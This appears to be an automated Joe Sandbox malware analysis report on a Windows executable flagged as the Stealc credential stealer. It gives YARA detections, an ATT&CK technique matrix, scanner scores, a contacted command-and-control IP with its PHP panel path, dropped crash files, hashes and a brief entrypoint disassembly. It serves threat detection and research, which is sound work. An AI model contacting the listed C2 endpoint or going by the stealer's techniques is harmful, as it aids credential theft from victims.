Source: C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Code function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417A30

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe PID: 5500, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	123 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	29%	ReversingLabs
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	38%	Virustotal		Browse
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	100%	Avira	HEUR/AGEN.1310247
100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://62.204.41.150	9%	Virustotal		Browse
http://62.204.41.150/	9%	Virustotal		Browse
http://62.204.41.150/edd20096ecef326d.php	12%	Virustotal		Browse
http://62.204.41.150/ows	6%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/	true	9%, Virustotal, Browse	unknown
http://62.204.41.150/edd20096ecef326d.php	true	12%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
http://62.204.41.150/0	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.php?	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpo	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204081074.000000000073E000.00000004.00000020.00020000.00000000.sdmp, 100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse	unknown
http://62.204.41.150/edd20096ecef326d.phpL	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpl	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.php)	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/ows	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe, 00000000.00000002.2204196068.00000000007AC000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.150	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528595
Start date and time:	2024-10-08 03:51:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 166
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com

Simulations

Behavior and APIs

Time	Type	Description
21:52:17	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
62.204.41.150	MmcJhaiYNh.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	XQywAEbb9e.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.150/edd20096ecef326d.php
	Aew8SXjXEb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	RJQySowVRb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TNNET-ASTNNetOyMainnetworkFI	MmcJhaiYNh.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	XQywAEbb9e.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.150
	Aew8SXjXEb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	RJQySowVRb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	0h5IfpqflF.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	552RZ9fPMe.exe	Get hash	malicious	Stealc	Browse	62.204.41.159

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_100f1c346cbcff15_b159fbceb9912cab3fd2e3d37e4ec18be14df62d_95985173_2e3eaac1-891a-4140-88f1-7c1710ec26ab\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0050931378024768
Encrypted:	false
SSDEEP:	192:dyYC3JvOp80gkZhlnRjBmZroZtzuiFcZ24IO8qGnU:Wv2gkZljTTzuiFcY4IO8zU
MD5:	AE9EB49E39DE7133599CE7D53D4D90B6
SHA1:	5EF736EA001CC376114E24AD9714BBA140842175
SHA-256:	13B2483B2EC30CEB44536289C93C26B55E3C07E2E2BC003830BFA695B0AF89E9
SHA-512:	A580D5A962CF7DB924C0519E67670A5D95CBAA6E1DEBC967D8972EE85D589F12AAE0800F80CB96CBFE43FC370B8DF6EBC2E3AE146468D1BD7B1B33BD73364876
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.5.9.2.3.3.8.9.6.0.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.5.9.2.3.9.3.6.4.7.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.3.e.a.a.c.1.-.8.9.1.a.-.4.1.4.0.-.8.8.f.1.-.7.c.1.7.1.0.e.c.2.6.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.c.1.0.1.1.2.-.5.6.2.d.-.4.2.0.0.-.b.a.7.a.-.c.9.2.8.0.1.2.4.7.9.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.0.0.f.1.c.3.4.6.c.b.c.f.f.1.5.f.4.d.9.d.7.5.c.7.9.1.0.0.0.6.2.5.8.5.0.e.1.c.8.2.b.4.4.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.c.-.0.0.0.1.-.0.0.1.4.-.4.6.2.f.-.7.d.a.a.2.4.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.1.9.c.4.0.b.8.d.a.0.6.d.3.6.9.0.a.5.c.a.6.5.9.c.1.e.c.0.8.7.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.6.7.5.a.d.9.0.c.1.6.4.2.4.4.b.a.c.1.c.3.a.5.c.b.a.c.c.9.3.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CD3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 8 01:52:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	65062
Entropy (8bit):	1.9988010380131156
Encrypted:	false
SSDEEP:	192:0wfOX7NSUfsYXwp7OROsw4/NySbs+w7BU4fQnj0f5nyNbgZpoZFq2sPkmeU7pwc6:wNSe8YRR5ogM75FyN5W2ckvVcRU
MD5:	63791BD6C9925DABE37BC035CD293D3E
SHA1:	A3B6544570B7F803D8A3333674500EA48C4EF10E
SHA-256:	A55E27F6453FC7221F190D1A5F330FADB5C856010AD189C9E3B06BAF02F443B5
SHA-512:	526A85C2DA7B648A9912FB0D44070D27C8E415597C8FE0915F3B00C9ADF5F6C56361051DDBFA37EAC89A3FDC12E88634EE87F28ED864B84A2339E384B6E4DC14
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......C..g............4...............<............*..........T.......8...........T............3..&.......................................................................................................eJ......H.......GenuineIntel............T.......\|...@..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E1C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8546
Entropy (8bit):	3.6991723683728415
Encrypted:	false
SSDEEP:	192:R6l7wVeJzxEE6Blw6YEIvSU9/+Ogmf2xjxiGwpDB89bCfsfd2m:R6lXJzB6k6YEASU9/+Ogmf21AyCEf1
MD5:	6C5D71E3E18C8FD06E5397F359A4757B
SHA1:	E016758F1A4112D97CBCEC47411945552E2A3E1C
SHA-256:	AA3E26CD5FA1A9BD1CEF068E80339735EE1517D442D6E56D324704768B62A607
SHA-512:	D8C7EF1637662E95EFF94E1CABC854B3A5BC79B6BB40E3DA83FC4A31ADEC2DCFADEA85F1FCE5CE2556AC465ED23ED599E11B32A1751936098A59279B97AB0BDA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E4C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4824
Entropy (8bit):	4.533351573375121
Encrypted:	false
SSDEEP:	96:uIjfeI7wM7V+J8S0wS0PS0KMS01S0y5LS0znS0z3d:uICYwM7gZ0d060o0s0y5m0zS0zN
MD5:	96C0C68F3759455C46A0D649CD3AC94A
SHA1:	965122216EE1C8970D0BDD57FABC442402986797
SHA-256:	C47941DA1361E316E8D6685CACEB1E5480847D49CEA61CDFDD29F4ACF114E622
SHA-512:	3CB2A9BC5A0C6262ECC212D61E2F82466E8220FB6E25C94779C75365B7EB5B2CE15C413E8F0DFF7EBA9C9F610B6C5F9A0FAA4143144F3A9DF6C5E34F73AB185D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533814" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421679072338445
Encrypted:	false
SSDEEP:	6144:USvfpi6ceLP/9skLmb0OTPWSPHaJG8nAgeMZMMhA2fX4WABlEnNh0uhiTwB:fvloTPW+EZMM6DFy/03w
MD5:	D7C66E6A0C1F19803322DB9A1D9CB31E
SHA1:	42D59F088C1255C86928928032745A47C1F92BA2
SHA-256:	09B911EFD3C9CC721DEDBEAE29E936D4D23AA9149DCF7C4B7BBFB636D03C65AB
SHA-512:	36AFA12FA6601251757888B6421BC597CC9D87CD0CCD76D797E949509B63D624481DF778AB4C0D6F46A4CCFA381EB710CCD0370B4A303F3942BDB13757B676BA
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.]..$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.356567276473533
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
File size:	454'144 bytes
MD5:	e35c6ad41081ddcda2ba9c65b5b1a6f8
SHA1:	e675ad90c164244bac1c3a5cbacc932e9e0b3a8d
SHA256:	100f1c346cbcff15f4d9d75c791000625850e1c82b44ce9427ccf441f5c3cb79
SHA512:	d200ed497d6345e0ebe1b56887100fceb7b7333d1bfdcc68c5b7b4dd38ad71e1ae9331f6e1d4d23d480348090ae1d87d17323c58ae2c6ac6b02b97940e9405a2
SSDEEP:	6144:2odLe5UeS/3dUS5HaHecUnpYEiA0+IW+Rv82S2knxC9og4gEGy6BbO42T8:Hi5UeS/3hxaHeRYTA09Zv8znxINO4O
TLSH:	F7A4C00662F9EEA0F5D24A338D1EEAE8A66DF851DE186757331C7B1F1F71261C222311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...P#.e...................

File Icon


Icon Hash:	4125514d4555610d

Static PE Info

General

Entrypoint:	0x403bf9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65A02350 [Thu Jan 11 17:20:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	cf2df69e8bb6acbf3b231da2c6f4bda2

Entrypoint Preview

Instruction
call 00007F929920A619h
jmp 00007F929920756Eh
push dword ptr [00451258h]
call dword ptr [0040F12Ch]
test eax, eax
je 00007F92992076E4h
call eax
push 00000019h
call 00007F9299209EFBh
push 00000001h
push 00000000h
call 00007F9299206EA0h
add esp, 0Ch
jmp 00007F9299206E65h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040F3C0h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F92992076EEh
test byte ptr [eax], 00000008h
je 00007F92992076E9h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040F160h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49b40	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x1f108	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49bb8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x490c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x1fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xd4dd	0xd600	cc351b432cf818723472b888ed6a2a9d	False	0.6018728095794392	data	6.6710878171345795	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x3b6d2	0x3b800	81d88c5356a7c1ae54781807396bf3c4	False	0.7520146730567226	data	6.872256353996381	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4b000	0x11cc0	0x6000	a91c8f3896e1957adf9b2d8d8630ae55	False	0.0838623046875	data	1.091698110383614	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.jozizud	0x5d000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.raxup	0x5e000	0xd6	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.maweb	0x5f000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x60000	0x200108	0x1f200	149caa9063813d981f0917bd974018c1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
